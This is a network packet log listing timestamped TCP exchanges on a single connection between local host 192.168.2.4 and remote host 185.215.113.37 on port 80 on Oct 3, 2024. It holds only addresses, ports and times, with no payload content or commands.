Oct 3, 2024 18:38:22.913217068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913321972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913336992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913352013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913366079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913382053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913405895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913593054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913606882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913621902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913636923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913644075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913650990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913691998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913719893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.923842907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.923903942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.923909903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.923926115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.923957109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.923983097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924118996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924134970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924149036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924165010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924179077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924180031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924231052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924513102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924529076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924542904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924561024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924601078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924880028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924895048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924909115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924922943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924928904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924938917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924953938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924962044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.924969912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924984932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.924998045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925013065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925035954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925052881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925483942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925499916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925513983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925529003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925544024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925546885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925559044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925575018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925575018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925589085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925602913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925614119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925618887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925633907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.925642014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925667048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.925688982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926486015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926501989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926515102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926529884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926542997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926547050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926563025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926572084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926578045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926593065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926606894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926611900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926621914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926635981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926636934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926654100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.926656008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.926695108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.927406073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927421093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927434921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927449942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927462101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.927464962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927481890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927496910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927503109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.927541971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.927979946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.927994967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928009033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928023100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928037882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928039074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928054094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928061962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928071022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928085089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928098917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928100109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928114891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928131104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928138018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928160906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928189039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.928956985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928972960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.928987026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929001093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929016113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929017067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929032087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929047108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929059982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929061890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929081917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929081917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929100037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929115057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929116011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929151058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929167032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929884911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929900885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929914951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929929972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929935932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929944992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929960012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929960966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.929975033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929990053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.929999113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.930003881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.930021048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.930021048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.930037022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.930052996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.930057049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.930094957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003563881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003632069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003635883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003667116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003690004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003716946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003720999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003755093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003772020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003789902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003807068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003827095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.003839970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.003879070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004049063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004081964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004115105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004147053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004148960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004183054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004190922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004218102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004230976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004251957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004264116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004286051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004307985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004343033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004663944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004717112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004725933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004750967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.004766941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.004802942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005023956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005057096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005079985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005090952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005114079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005130053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005146027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005181074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005261898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005294085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005311966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005326986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005348921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005358934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005390882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005420923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005424976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005458117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.005458117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005490065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.005511045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.014991999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015034914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015048027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015064955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015094995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015161037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015176058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015191078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015207052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015228987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015254021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015428066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015549898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015563011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015566111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015583038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015598059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015599966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015613079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.015650034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015683889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.015994072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016009092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016025066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016040087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016047955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016057014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016072989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016088963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016091108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016125917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016143084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016655922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016671896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016688108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016705990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016738892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016819000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016838074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016853094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016877890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016885042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016892910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016906977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016920090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016925097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016941071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016954899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016957998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.016971111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016985893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.016998053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017004013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017020941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017055988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017793894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017807961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017822981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017838001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017852068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017853022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017870903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017883062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017888069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017903090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017918110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017925978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.017934084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017951012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.017971992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.018009901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019093990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019109964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019124031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019139051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019154072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019165993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019170046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019185066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019188881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019201994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019215107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019216061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019233942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019239902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019248962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019279957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019309998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019718885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019736052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019757032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019767046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019773006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019788027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019788980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019804955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019814014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019819021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019834995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019850016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019850969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019866943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019881964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019889116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019897938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.019916058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019933939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.019984961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020701885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020719051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020733118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020746946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020751953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020762920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020773888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020778894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020793915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020808935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020811081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020823956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020836115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020839930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020853996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020863056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020869017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020888090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020904064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.020906925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.020946980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.021549940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.021565914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.021579981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.021611929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.021636009 CEST	49730	80	192.168.2.4	185.215.113.37
